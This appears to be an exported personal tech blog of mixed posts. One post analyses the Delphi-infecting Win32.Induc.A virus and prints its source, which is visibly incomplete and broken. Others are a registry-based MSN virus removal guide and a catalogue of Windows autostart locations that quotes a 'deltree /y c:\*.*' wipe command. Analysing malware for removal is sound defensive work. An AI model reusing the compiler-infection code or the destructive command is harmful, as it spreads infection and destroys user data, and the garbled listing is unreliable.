jauming

Win32.Induc.A

2012-01-25T05:23:00.001-08:00

Win32.Induc.A

http://www.bitdefender.com/VIRUS-1000528-en--Win32-Induc-A.html

( Virus.Win32.Induc.a; W32/Induc virus; Win32.Induc; W32.Induc.A )

Spreading:
high

Damage:
low

Size:
varies

Discovered:
2009 Aug 19

SYMPTOMS:

Presence of a file named sysconst.bak in %Delphi_Installation_Folder%\Lib\ folder.

TECHNICAL DESCRIPTION:

     This threat spreads by infecting the systems running the Delphi development environment. When the virus code is executed it will first check if Delphi (version 4 through 7) is installed on the computer by trying to open the following registry key:
KKLM\SOFTWARE\Borland\Delphi\
If found, it will get the Delphi installation folder from the same registry key.
Next it will copy
%Delphi_Installation_Folder%\Source\Rtl\Sys\SysConst.pas to %Delphi_Installation_Folder%\Lib\SysConst.pas
and add its malicious code in the implementation section of this copy. This file will be then compiled, resulting an infected sysconst.dcu (Delphi compiled unit) but not before making a copy of the once clean sysconst.dcu file under sysconst.bak. Then the copy of sysconst.pas will be deleted.
     As sysconst is included in each software compiled in Delphi, every program compiled with an infected Delphi will have the virus code embedded.
     The malware does nothing if Delphi is not installed.
     This threat has no payload besides self-replication.

Removal instructions:

Please let BitDefender disinfect your files.
Overwrite %Delphi_Installation_Folder%\Lib\sysconst.dcu with %Delphi_Installation_Folder%\Lib\sysconst.bak

DelphiWin32.Induc分析報告

Virus.Win32.Induc.a 感染型的分析：

一、檔資訊

文件大小：163840位元組

加殼類型：ASPack 2.12

編寫語言：Borland Delphi 6.0

病毒類型：感染型

二、病毒描述

該樣本為Delphi感染型病毒，通過感染Delphi庫文件中的SysConst.dcu檔，使用戶在使用被感染的庫檔編程後，生成的檔均被感染。

三、病毒行為

1.病毒在第N次處理初始化表時(Call StartExe)進行操作，即完成在程式載入正常Delphi檔前執行病毒代碼。(數位N根據被感染用戶的Delphi版本不同有所不同)。

2.迴圈檢測註冊表鍵值HKLMsoftwareBorlandDelphi X.0 判斷當前機器是否安裝Delphi。檢測版本(4.0 5.0 6.0 7.0)。如本機未安裝則直接跳出病毒代碼進行正常的初始化工作，不進行感染。

3.如安裝了Delphi則通過訪問註冊表得到用戶的Delphi安裝路徑。

4.根據用戶安裝路徑將原始檔案夾中的SysConst.pas和庫文件夾中的SysConst.dcu備份;

即%%SourceRtlSysSysConst.pas 與%%LibSysConst.dcu。

5.將Delphi源碼代碼寫入原始檔案SysConst.pas中

6.調用%%Bindcc32.exe 將感染後的源碼文件SysConst.pas 生成本地庫檔放入Lib替換SysConst.dcu文件。

7.將正常SysConst.pas備份恢復，刪除源碼中感染的檔。

8.更改庫文件中被替換後的SysConst.dcu檔時間，使其與其他檔一致。

四、病毒危害程度

該病毒實際上並不具有危害性，只是其更改了庫檔後使編譯生成的所有程式均帶有不正常代碼，而其代碼行為即為以上描述。

因為其將Delphi庫檔修改使其使用Delphi語言編譯後的檔均被感染，所以被感染檔大小不一，加殼情況也各異，本分析樣本只是從中隨機挑選，樣本大小與加殼類型都不具有代表性。

五、解決方案

這個病毒具有二次感染能力，也就是說原來你編譯出來的所有Delphi程式都可以再次感染你機器上的Delphi庫檔，要徹底清除該病毒需做到以下幾點：

1、不要運行任何Delphi編寫的程式。

2、使用殺軟掃描所有的Delphi編寫的可執行檔並清除病毒。(或直接刪除所有哦的Delphi編寫的可執行檔，包括從網上下載的)

3、將文件 %DelphiInstallPath%LibSysConst.dcu 刪掉，然後執行步驟4 或步驟5和6。

4、將文件 %DelphiInstallPath%LibSysConst.bak 改名為 SysConst.dcu，結束。

5、調用 DCC32.exe 編譯出新的 SysConst.dcu ，編譯命令如下： %DelphiInstallPath%binDCC32.exe "%DelphiInstallPath% SourceRtlSysSysConst.pas"

6、將新編譯的SysConst.dcu(在%DelphiInstallPath% SourceRtlSys目錄下)檔複製到 %DelphiInstallPath%Lib 目錄，結束。

六、附錄(Delphi源碼)

uses windows;

var sc:array[1..24] of string=(

function x(s:string):string;

var i:integer;

begin

for i:=1 to length(s) do

if s[i]=#36 then

s[i]:=#39;

result:=s;

end;

procedure re(s,d,e:string);

var f1,f2 : textfile;

h : cardinal;

f : STARTUPINFO;

p : PROCESS_INFORMATION;

b : boolean;

t1,t2,t3 : FILETIME;

begin

CreateFile( pchar( d + $bak$ ), 0, 0, 0, 3, 0, 0);

if h<>DWORD(-1) then begin

CloseHandle(h);

exit;

end;

assignfile(f1,s);

reset(f1);

if ioresult<>0 then

exit;

assignfile(f2, d + $pas$);

rewrite(f2);

if ioresult<>0 then begin

closefile(f1);

exit;

end;

while not eof(f1) do begin

readln(f1,s);

writeln(f2,s);

if pos($implementation$,s) <>0 then

break;

end;

for h:= 1 to 1 do

writeln(f2,sc[h]);

for h:= 1 to 23 do

writeln(f2, $$$$+sc[h],$$$,$ );

writeln(f2, $$$$+sc[24]+$$$);$ );

for h:= 2 to 24 do

writeln(f2, x(sc[h]));

closefile(f1);

closefile(f2);

MoveFile(pchar(d+$dcu$),pchar(d+$bak$));

fillchar(f,sizeof(f),0);

f.cb:=sizeof(f);

f.dwFlags:=STARTF_USESHOWWINDOW;

f.wShowWindow:=SW_HIDE;

b:=CreateProcess(nil, pchar(e+$"$+d+$pas"$), 0, 0, false, 0, 0, 0, f, p);

if b then

WaitForSingleObject(p.hProcess,INFINITE);

MoveFile(pchar(d+$bak$), pchar(d+$dcu$));

DeleteFile(pchar(d+$pas$));

h:=CreateFile(pchar(d+$bak$),0,0,0,3, 0,0);

if h=DWORD(-1) then

exit;

GetFileTime(h,@t1,@t2,@t3);

CloseHandle(h);

h:= CreateFile(pchar(d+$dcu$),256,0,0,3,0,0);

if h=DWORD(-1) then

exit;

SetFileTime(h, @t1,@t2,@t3);

CloseHandle(h);

end;

procedure st;

var k : HKEY;

c : array [1..255] of char;

i : cardinal;

r : string;

v : char;

begin

for v:=$ to $ do

if RegOpenKeyEx(HKEY_LOCAL_MACHINE, pchar($SoftwareBorlandDelphi$ + v+ $.0$ ), 0, KEY_READ, k) = 0 then begin

i:=255;

if RegQueryValueEx(k,$RootDir$,nil,@i,@c,@i)=0 then begin

r:=$$;

i:= 1;

while c[i] <> #0 do begin

r:=r+c[i];

inc(i);

end;

re( r + $sourcertlsysSysConst$ + $.pas$, r + $libsysconst.$, $"$+r+$bindcc32.exe"$);

end;

RegCloseKey(k);

end;

begin

st;

end.

http://www.gsa-online.de/products-delphi_induc_virus_remover.php

http://www.gsa-online.de/download/induc_cleaner_setup.exe

http://www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?name=Virus%3AWin32%2FInduc.A

在 Windows 7 下安裝 Visual C++ 6的方法

2012-01-14T01:11:00.000-08:00

在 Windows 7 下安裝 Visual C++ 6的方法

關鍵字: Visual C++ 6, vc6, win7, 安裝, 編譯

在安裝 vc6 選擇安裝項目時, 不要選擇 [TOOLS] 裡面的 [OLE/COM OBJECT VIEWER
工具]就可以順利安裝了

在開啟 vc6 前先以右鍵選擇 [以系統管理員身分執行(A)]如此就可以執行編譯的程式

參考:

Windows 7 & Vista下安装VC++,VS6.0,VC6.0最新突破http://reseth.blogbus.com/logs/38487767.html

Windows 7完美安装VC6和Delphi7
http://www.gogofly.com/blog/article/Note/68.html

sqmdata00.sqm

2011-09-06T06:28:00.001-07:00

當顯示所有的內容時，不知各位是否有發現到，在C槽底下最近曾出現sqmdata00.sqm、sqmdata01.sqm、sqmdata02.sqm…..等的相關檔案，窄看之下，以為不會吧！走了一個autorun又來了一個sqm，上網查了一下，原來是自已太敏感了，.sqm主要是由MSN新版所產生的檔案，不是病毒但感覺還蠻礙眼的，現在就來看一下怎麼防止xxxx.sqm不斷的產生。

Step1
開啟MSN功能表，選擇工具 / 選項，進入選項畫面後，選擇左選單中的一般，並將允許Microsoft收集相關XXX的選項取消。

Step2
接下來再把C槽中所產生的sqmdata00.sqm、sqmdata01.sqm、sqmdata02.sqm直接刪除即可。

建立一張簡易的無人值守 Windows XP 安裝光碟

2011-08-20T05:10:00.001-07:00

或許你看過一些 Windows XP，很神奇的，他能夠免除掉安裝中所有的問答項目，
直接安裝到完畢為止，這並不是"高手"去改了Windows 的安裝程式，
而是採用了所謂的 Unattended 安裝方式，
當然了，使用別人所製作的這種自動安裝光碟很方便，
但是畢竟裡面都是制式化的應答，無法個性化自己所需，
如果我們能夠自己做到屬於自己的 Unattended Windows XP，那不是很好嗎...?
其實關於這部份的製作相當簡單，校長相信你在看完本文後，也一定能夠做出屬於自己的自動安裝光碟
所謂的自動安裝，只不過是事先將安裝過程的應答以檔案的方式存進光碟，
待安裝之際，便自動提取該檔中的應答項目，完成 Unattended 安裝，
而這個檔案，置放的就是在安裝光碟中的 i386 目錄下，檔名為 winnt.sif
當然了，或許你會說，這樣有一點麻煩，能不能在安裝之際，用軟碟的方式導入該檔，
答案是可以的....，但相對的你要付出的代價就是使用軟碟開機安裝
而這軟碟不是 98 開機片，而是安裝 XP 的專用開機片，共六片.
相較於慢慢使用安裝軟碟開機安裝，不如將 winnt.sif 寫入光碟中，
帶安裝完畢後再來做細部調整
下載後我們將他用 WinRAR 解壓縮，裡面有兩個檔案是我們這次所需要的工具
一個是 setupmgr.exe 這東西是安裝管理員，另一個是 ref.chm 是說明檔
其實，說明檔有沒有並不重要，當然了如果你有興趣，你可以更進一步的參考 ref.chm 中的各項說明
接著，我們將運行 setupmgr.exe 創建 Unattended 應答檔
接著按照步驟把一些資料填入最後
將會生成一個檔名為 unattended.txt 的文字檔
我們再將它改檔名 winnt.sif 存放到 Windows 安裝光碟中的 i386 目錄內即可
工具
http://download.microsoft.com/download/f/b...oyTools-CHT.cab

修正skype當機

2011-07-02T21:30:00.001-07:00

修正skype當機:
Type "%appdata%\skype" and click OK. Locate and delete the file shared.xml.

iphone用4.1固件降級4.2.1現3194錯誤

2011-07-02T02:28:00.001-07:00

iphone用4.1固件降級4.2.1現3194錯誤：

在c:\windows\system32\drivers\etc，找到HOSTS文件，用記事本打開；在最後一行，
新加 74.208.10.249 gs.apple.com。重新打開iTUNES 和 iPhone。

To fix Duke.Nukem.Forever slow issue:

2011-06-15T04:02:00.001-07:00

To fix Duke.Nukem.Forever slow issue:

put following system.ini in System folder

http://dl.dropbox.com/u/390922/Duke.Nukem.Forever/system.ini

or:

【轉】用 vc6.0 創建一個使用 wpcap.dll 的應用程式，遇到的問題

2010-12-12T03:56:00.001-08:00

【轉】用 vc6.0 創建一個使用 wpcap.dll 的應用程式，遇到的問題

轉載請注明出處 http://hi.baidu.com/handt03

===========================================

首先拿官方的示例來編譯，遇到的問題有：

1.pcap-stdinc.h(76) : error C2054: expected '(' to follow '_W64

error C2085: 'uintptr_t' : not in formal parameter list

error C2628: '_W64' followed by 'int' is illegal (did you forget a ';'?)

解決辦法：

在pcap.h 檔頭增加如下定義：

#define _W64
#include <pcap/pcap.h>

也就是在#include <pcap/pcap.h>定義前面加上#define _W64

2.鏈結的時候出現問題：

LINK : fatal error LNK1104: cannot open file "Iphlpapi.lib "

解決：在自己的電腦上搜索 iphlpapi.lib（這個是iphelp的庫，在windows的platform SDK中）文件，然後 copy 到 vc 中設置的 library file 選項包含的檔夾中。比如 \vc98\lib 下。

參考：

Winpcap _W64 Er ： http://blog.csdn.net/linkyang/archive/2009/08/07/4423500.aspx

關於winpcap 的問題 http://topic.csdn.net/u/20070817/15/6c01ae14-16c6-480c-a633-38b36a6b2f07.html

Macbook 裝xp 聲音變小解決

2010-09-12T02:31:00.001-07:00

Macbook 裝xp 聲音變小解決

方法是國外一牛人的博客中寫到的（http://www.stuffedcow.net/macbook_audio），他自己重寫了音效卡的驅動（牛人。。）。。所以我在這只是教下大家如何使用而已

博客裏放出了如下zip包： CirrusAudioXP_Macbook_b.zip (33 K)

CirrusAudioXP_Macbook_c.zip (33 K)

第二個是比較新的。具體哪個有用估計要看自己的電腦了。但是我自己測試能用的是第一個，也就是b包，C包反而沒效果

不囉嗦，開始裝驅動：

首先下載上面的2個附件，要安裝哪個就先將哪個解壓到桌面吧

（注：如果其中一個按下面的方法安裝後問題還是沒解決，就將解壓了的檔全部刪掉，然後將另外一個附件解壓到桌面，再按下面方法安裝一次）

右鍵點擊我的電腦，選擇內容，然後選擇硬體，最後點擊裝置管理員

然後展開“聲音、視頻和遊戲控制器”點擊紅圈中的羅技音效卡（在這時，你的音效卡名字會和我的圖片裏的不一樣，因為我已經安裝這個驅動了，名字才不同）

點擊驅動程式，然後再點擊更新驅動程式

選擇“不，現在不要”，然後點擊下一步

選擇“從清單或指定位置安裝”，然後下一步

選擇“不要搜尋，我要自己選擇要安裝的驅動程式”，然後下一步

直接點擊“從磁片安裝” （不要管我圖中列表中的驅動，因為我已經安裝測試了幾個驅動了）

找到你解壓在桌面的驅動檔夾的路徑，然後打開圖中紅圈文件

然後回到了驅動選擇列表，選擇下圖一項

這時候會彈出警告，無視掉，點擊“繼續安裝”

裝完後——————重啟······

重啟後，你就用 QQ語音設置裏看看安裝後有沒有效果，如果沒有解決問題，就安裝另外一個驅動。

如果2個都沒效果，那我也沒轍。你就繼續關注這個牛人，看他會不會更新出後續驅動來

關於ZIP包裏的2個不同驅動不用途：

Cirrus Logic High Definition Audio [Macbook]----------這個驅動只解決win系統下，外置揚聲器聲音過小的問題

Cirrus Logic High Definition Audio [Macbook, No S/PDIF Out]------這個既解決聲音過小問題，也解決耳機孔紅光問題，關閉了數字輸入。

Uninstall Avira Antivir Completely

2009-05-02T19:52:00.001-07:00

Uninstall Avira Antivir Completely

http://www.themisteriosos.com/uninstall-avira-antivir-completely.htm

uninstallation package

Avira AntiVir Registry Cleaner

那是個思考題！題目是這樣的：

2009-04-26T17:12:00.001-07:00

那是個思考題！題目是這樣的：有一家4口，必須在17分鐘內過河，如沒有在限定的時間內過到對岸，那他們所處的地方就會爆炸。河邊有艘小船，每次只能承載2個人。他們劃船的速度是一一爸爸：1分鐘、媽媽：2分鐘、兒子：5分鐘 & 女兒：10分鐘。如果爸爸跟兒子先過河的話，那他們劃船到對岸的速度將會花費5分鐘（劃船速度將依據比較慢的那個），而爸爸回到原地需再花費1分鐘。他們如何能在17分鐘之內過河呢？

1) 1+2 過河, 1回來 (2+1)

(2) 10+5過河, 2回來 (10+2)

(3) 1+2過河 (2)

=> 17

賴賴與織織

2009-04-26T04:29:00.001-07:00

賴賴與織織

賴賴:

http://www.wretch.cc/blog/Lionchain

織織:

http://www.wretch.cc/blog/innermi

txt2pdf,etc.

2009-04-26T03:27:00.001-07:00

Enumerate Installed Devices Using Setup API

http://69.10.233.10/KB/system/EnumDevices.aspx

Scan2PDF

http://www.codeproject.com/KB/applications/Scan2PDF.aspx

Text2PDF

http://www.codeproject.com/KB/applications/Text2PDF.aspx

Smart Translator

http://www.codeproject.com/KB/applications/smarttranslator.aspx

WebReplay - an automated software testing tool for Web applications

http://www.codeproject.com/KB/applications/Web_Replay.aspx

Updater

http://www.codeproject.com/KB/applications/updater.aspx

WaterMarker

http://www.codeproject.com/KB/applications/WaterMarker.aspx

n次方根的計算機

2009-04-26T03:13:00.001-07:00

n次方根的計算機

http://www.codeproject.com/KB/applications/caclulater.aspx

容易想歪的漫畫

2009-04-26T03:06:00.001-07:00

容易想歪的漫畫

http://www.youtube.com/watch?gl=US&feature=player_embedded&v=_lzwXNI2FzY

msn virii remove

2009-04-26T03:01:00.001-07:00

MSN 中毒的最大特徵就是自己的帳號會不受控地 forward 毒檔或毒連結給人，甚至有更多不明的問題。以下簡述其解決方法：

情況1：收到朋友send來的連結，不慎click了入去：
通常這些網站都係誘騙你登入自己的帳戶及密碼，如乜乜.info等網站。黑客得知後，便可利用程式控制你的帳號並繼續作傳播。不過這些網站相信不會留下病毒在你電腦內的。
補救方法：儘快到官方網站更改帳戶密碼，看看防火牆及防毒有否被關上，清空所有Temporary Internet Files 及 cookies。不過如果你只是登入網站而沒有輸入任何資料，相信不會受影響的。

情況2：透過接收檔案而中毒：

/*********** 鑑別種類 ***********/
由於近來出現了一款新特徵的病毒，其毒檔名稱是一串隨機英文字母，特性有別於傳統的MSN病毒，但病徵卻是一樣，我暫且稱它們為「隨機型」MSN病毒。所以如果你確實中了毒，在閱讀下文前，先要知道是中了「傳統型」還是「隨機型」：
基本步驟：
開始 > 執行 > 輸入 services.msc，按一按欄位的「名稱」來排序，查看有沒有一個名為Print Spooler Service 的服務項，留意不是Print Spooler 啊！不過，病毒開始有變種跡象，其服務項的名稱還發現有：

Ati HotKey
Aventail VPN Client
BlueSoleilCS
BT Modem Lock
CMG Shield
Cognos ReportNet
CommServer
Compaq DMI Web Agent
Creative Labs Licensing
DigiCtrl
DQLWinService
Electronic Arts Licensing Service
SolidWorks Licensing Service

如果有，請看「隨機型MSN病毒」一文；沒有則參閱「傳統型MSN病毒」一文。

/*********** 「隨機型」MSN病毒 ***********/
步驟一：登入服務 (開始 > 執行 > 輸入 services.msc)
即是你剛才登入的地方，右鍵按剛才找到的服務項 > 內容 > 在「一般」下，你會看見「執行檔所在路徑」，它所指著的檔案便是作惡的病毒檔案了！請記下它，因為每一個個案都不同的，例如C:\Windows\system32\ppldji.exe，並且在「啟動類型」選「已停用」> 確定。但要注意如果你中了多於一個msn毒，則未必能在這裏找出來的，但在步驟二裏多數可找到線索。
步驟二：登入regedit (開始 > 執行 > 輸入 regedit)

1. 分別到
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices]，檢查右邊有沒有剛才出現過的古怪名稱，例如ppldji，有則刪除。
步驟三：重新啟動電腦。
步驟四：刪除那個位於C:\Windows\System32入面的古怪檔案，例如ppldji.exe，以及你不小心下載回來的zip檔。
步驟五：下載SREng http://www.kztechs.com/sreng/download.html

開啟後，選啟動專案 > 服務 > Win32 服務應用程式 > 在服務名下查看有沒有以上提及的服務項名稱，有則點選該項目 > 刪除服務 > 否，然後重新啟動電腦。

步驟六，檢查剛才的步驟，確保機碼及檔案已不存在，便可以開啟msn了！

/*********** 「傳統型」MSN病毒 ***********/
步驟一：登入regedit (開始 > 執行 > 輸入 regedit)
1. 先尋找以下位置：
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad]
檢查右邊的機碼有沒有以下任何一個 (多數是早期的msn毒)：
antivirus
modems
mjd
printers
prodigy1
prodigy323
prodigys323
rdshost
rdfhost
rdihost
syshosts
system32
systrays (不要刪除systray)
version1
w32s
= 一串CLSID
如果有，先抄下那串CLSID，以及它指向的檔案，然後刪除個機碼。如果沒有，則略過 (2)。
2. 刪除 [HKEY_CLASSES_ROOT\CLSID\{你剛才抄下的CLSID}]
3. 到[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
檢查右邊的機碼有沒有以下任何一個，沒有則略過：
Application Layer Gateway Service
Application Layer Services
Audio Device Manager
cdspeed.exe
chcp.exe
Client Server Runtime Process
ehSched
Firefox Plugin Manager
jucheck
kfh
Local Security Authority Service
Logical Disk Detection
Machine Debug Mgr
Memory Allocation Server
MicrosoftService
MicrosoftServicer
Microsoft Genuine Logon
Microsoft Internet Explorer
Microsoft Spooler
Microsoft Visual Application
mono.exe
MSN
MSn Client Cfg
MSN Software
MSN UPNP
Mss Vc
nVidia Display Driver
perfmon.exe
rcimlby.exe
Remote Terminal Service
Server Runtime Server Subsystem
setpoint.exe
sndrec.exe
Spooler SubSystem App
sy
Syncronization
System Services Monitor
User Sharing Wizard
Userfile Sharing Server
usnsvc.exe
Volume Shadow Configuration
wab.exe
wdrmgf.exe
Winamp Agent (留心有空格的，並非WinampAgent)
Windows Audio Control
Windows Audio Startup
Windows Bool Service
Windows Boot
Windows Config
Windows Explorer
Windows Explorer Key
Windows Live Msgs
Windows Live Messenger
Windows Live Servicer
Windows Logon Application
Windows Lsass Services
Windows Messenger Share
Windwos MSN Updates
Windows Network Firewall
Windows Network Service
Windows Pool Manager
Windows Pool Setup
Windows Population Logger
Windows Remote Launcher
Windows Section Event
Windows Terminal Manager
Windows Video Input
Windows Volume Control
winfp.exe
winlogon
若發現存在，請先記下該機碼指向的檔案，然後將整個機碼刪除。

1. 先尋找以下位置：[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad]檢查右邊的機碼有沒有以下任何一個 (多數是早期的msn毒)：

4. 如果你中了一個VBS型的病毒，那麼會經常有個警告彈出，寫著C:\abc.vbs之類的字眼。這時你需要刪除 [HKEY_CLASSES_ROOT\abc] 整個"abc" 機碼。
步驟二：跳出registry並重新啟動電腦。

步驟三：到控制台 > 資料項選項 > 檢視 > 點選 顯示所有檔案和資料夾及不選隱藏受保護的作業系統檔案 > 確定。

步驟四：刪除你剛才抄下的檔案
1.如在C:\下發現以下檔案，請刪除：
?rsss.exe ? 為任意一個英文字母
smsss.exe
pif.exe
autorun.inf
a.bat
abc.vbs
cba.vbs
1.txt
2.txt
f uckrav.com
2. 如在C:\Documents and Settings\用戶名\下發現以下檔案，請刪除：
auto.txt
new.txt
一個6位隨機字母數字.exe

3. 如在C:\Windows\下發現以下檔案，請刪除：
你不心下載回來的zip檔(如img301.zip、img1756.zip)，以及你剛才在步驟一第3項抄下來的檔案，它們可能是
ati3evx.exe
cdspeed.exe
chcp.exe
firefoxpgm.exe
install.exe
jitbv.exe
livemessenger.com
logon.exe
mono.exe
msn.com
msnmsg.exe
msnmsgr.exe
msnmsgs.exe
mysexpic.exe
perfmon.exe
rcimlby.exe
sdfax.exe
service52.exe
setpoint.exe
sfhgj.exe
svchost.exe (記住真正的svchost.exe是在C:\Windows\system32入面，一般會有5-6個在運行。)
system.exe
usnshare.exe
usnsvc.exe
vpcrtf.exe
wab.exe
wdfmgr.exe
winbool32.exe
windrivers.exe
winfp.exe
winlog32.exe
winpo32.exe
winsyshp.exe
wkssvr.exe
wndxp.exe
wnpmcs.exe
xaudiodev.exe
4. 如在C:\Windows\System\下發現以下檔案，請刪除：
ehsched.exe
explorer.exe
lsass.exe (真正的lsass.exe是在system32入面的！)
csrss.exe (真正的csrss.exe是在system32入面的！)
5. 如在C:\Windows\System32\下發現以下檔案，請刪除：
algs.exe
asrsvc.exe
audise.exe
ciserv.exe
csrs.exe
explorer.exe
firewall.exe
firewallav.dll
hs4viewer.dll
iexplore.exe
intlprinters.exe
isass.exe
kfh.exe
libcinet.exe
libweb.dll
libcintles2.dll
libcintles3.dll
logon.exe
lssas.exe
mdesvc.exe
mdn.exe
mrisvc.exe
msn.exe
msn.dll
msnclicfg.exe
msnfix.exe
msnlive.exe
msnsoftware.exe
msnupnp.exe
mssvc.exe
msync.exe
newsystem25.dll
nndsvc.exe
notiffy.dll
notice.dll
nvsvc64.exe
ongsvc.exe
poolmc.exe
poolsc.exe
ppnsvc.exe
prcsvc.exe
printers.exe
prodigy323.dll
prodigys323.dll
rdfhost.dll
rdihost.dll
rmbsvc.exe
rndsvc.exe
rpmsvc.exe
sdrec32.exe
service.exe
servicer.exe
sntsvc.exe
spooisv.exe
spoolsvc.exe
syshelps.dll
syshosts.dll
systrays.dll
sysprinters.dll
usnserv.exe
usnshare.exe
usnsrv.exe
usrserv.exe
vbmsvc.exe
viwsvc.exe
w32_mjd.dll
win422.dll
winamp.exe
winboot.exe
winconfig.exe
winlog32.dll
winiogon.exe
wkssvc.exe
wlivemsg.exe
wmssvc.exe
wnd32.exe
6. 如在C:\Windows\System32\dllcache\下發現以下檔案，請刪除：
jucheck.exe
winlogon.exe
7.在C:\Windows\System32\microsoft\入面，檢查有沒有兩個檔名為backup.tftp及backup.ftp，如沒有，請略過。如有，請依照以下步驟：
(i)將 backup.tftp 改成 tftp.exe，及將 backup.ftp 改成 ftp.exe
(ii) 將 tftp.exe 及 ftp.exe 複製到 C:\Windows\System32\ 及 C:\Windows\System32\dllache\，取代原先檔案即可。
步驟五：完成！可到控制台 > 資料項選項 > 檢視 > 點選 不顯示所有檔案和資料夾及選隱藏受保護的作業系統檔案 > 確定。可重新啟動msn了！

啟動項目:

2009-04-26T02:13:00.001-07:00

啟動項目:

自啟動程式 ShellServiceObjectDelayLoad

ShellServiceObjectDelayLoad
ShellServiceObjectDelayLoad是一個未公佈的註冊表項,可以將元件關聯到這個鍵,這樣一來,系統啟動時間EXPLORER將自動載入目標元件.
這就是某些病毒將自己注射到EXPLORER的辦法.
我們經常會遇到這樣的事情，IeXPLORER的首頁設置為BLANK，註冊表RUN鍵的值也為空，但就是每隔一會兒有莫名其妙的網頁自動彈出，這就是ShellServiceObjectDelayLoad在搞鬼。
O21 - 註冊表鍵 ShellServiceObjectDelayLoad (SSODL)處的自啟動項
揪出自啟動程式 [轉]
一、經典的啟動——“啟動”檔夾
單擊“開始→程式”，你會發現一個“啟動”功能表，這就是最經典的Windows啟動位置，右擊“啟動”功能表選擇“打開”即可將其打開，如所示，其中的程式和快捷方式都會在系統啟動時自動運行。最常見的啟動位置如下：
當前用戶：<C:\Documents and Settings\用戶名\「開始」功能表\程式\啟動>
所有用戶：<C:\Documents and Settings\All Users\「開始」功能表\程式\啟動>
二、有名的啟動——註冊表啟動項
註冊表是啟動程式藏身之處最多的地方，主要有以下幾項：
1.Run鍵
Run鍵是病毒最青睞的自啟動之所，該鍵位置是[HKEY_CURRENT_
USER\Software\Microsoft\Windows\CurrentVersion\Run]和[HKEY_
LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]，其下的所有程式在每次啟動登錄時都會按順序自動執行。
還有一個不被注意的Run鍵，位於註冊表[HKEY_CURRENT_
USER \Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run]和 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\
Policies\Explorer\Run]，也要仔細查看。
2.RunOnce鍵
RunOnce位於[HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\RunOnce]和[HKEY_LOCAL_MACHINE\Software\Microsoft\
Windows\CurrentVersion\RunOnce]鍵，與Run不同的是，RunOnce下的程式僅會被自動執行一次。
3.RunServicesOnce鍵
RunServicesOnce鍵位於[HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\RunServicesOnce]和[HKEY_LOCAL_MACHINE\
Software\Microsoft\Windows\CurrentVersion\RunServicesOnce]下，其中的程式會在系統載入時自動啟動執行一次。
4.RunServices鍵
RunServices繼RunServicesOnce之後啟動的程式，位於註冊表[HKEY_CURRENT_USER \Software\Microsoft\Windows\CurrentVersion\RunServices]和 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\
RunServices]鍵。
5.RunOnceEx鍵
該鍵是Windows XP/2003特有的自啟動註冊表項，位於[HKEY_
CURRENT_USER \\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx]和 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ RunOnceEx]。
6.load鍵
[HKEY_CURRENT_USER\Software\Microsoft\WindowsNT\CurrentVersion\Windows]下的load鍵值的程式也可以自啟動。
7.Winlogon鍵
該鍵位於位於註冊表[HKEY_CURRENT_USER\SOFTWARE\
Microsoft\Windows NT\CurrentVersion\Winlogon]和[HKEY_LOCAL_MACHINE\
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]，注意下面的Notify、Userinit、Shell鍵值也會有自啟動的程式，而且其鍵值可以用逗號分隔，從而實現登錄的時候啟動多個程式。
8.其他註冊表位置
還有一些其他鍵值，經常會有一些程式在這裏自動運行，如：[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\Shell]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad]
[HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System\Scripts]
[HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System\Scripts]
小提示
註冊表的[HKEY_LOCAL_MACHINE]和[HKEY_CURRENT_USER]鍵的區別：前者對所有用戶有效，後者只對當前用戶有效。
三、古老的啟動——自動批次檔案
從DOS時代過來的朋友肯定知道autoexec.bat（位於系統盤根目錄）這個自動批次檔案，它會在電腦啟動時自動運行，早期許多病毒就看中了它，使用deltree、format等危險命令來破壞硬碟資料。如“C盤殺手”就是用一句“deltree /y c:\*.*”命令，讓電腦一啟動就自動刪除C盤所有檔，害人無數。
小提示
★在Windows 98中，Autoexec.bat還有一個哥們——Winstart.bat文件，winstart.bat位於Windows檔夾，也會在啟動時自動執行。
★在Windows Me/2000/XP中，上述兩個批次檔案默認都不會被執行。
四、常用的啟動——系統配置檔
在Windows的配置檔（包括Win.ini、System.ini和wininit.ini檔）也會載入一些自動運行的程式。
1.Win.ini文件
使用“記事本”打開Win.ini檔，在[windows]段下的“Run=”和“LOAD=”語句後面就可以直接加可執行程式，只要程式名稱及路徑寫在“＝”後面即可。
小提示
“load=”後面的程式在自啟動後最小化運行，而“run=”後程式則會正常運行。
2.System.ini文件
使用“記事本”打開System.ini文件，找到[boot]段下“shell=”語句，該語句默認為“shell=Explorer.exe”，啟動的時候運行Windows外殼程式explorer.exe。病毒可不客氣，如“妖之吻”病毒乾脆把它改成“shell=c:\yzw.exe”，如果你強行刪除“妖之吻”病毒程式yzw.exe，Windows就會提示報錯，讓你重裝Windows，嚇人不？也有客氣一點的病毒，如將該句變成 “shell=Explorer.exe 其他程式名”，看到這樣的情況，後面的其他程式名一定是病毒程式如所示。
3.wininit.ini
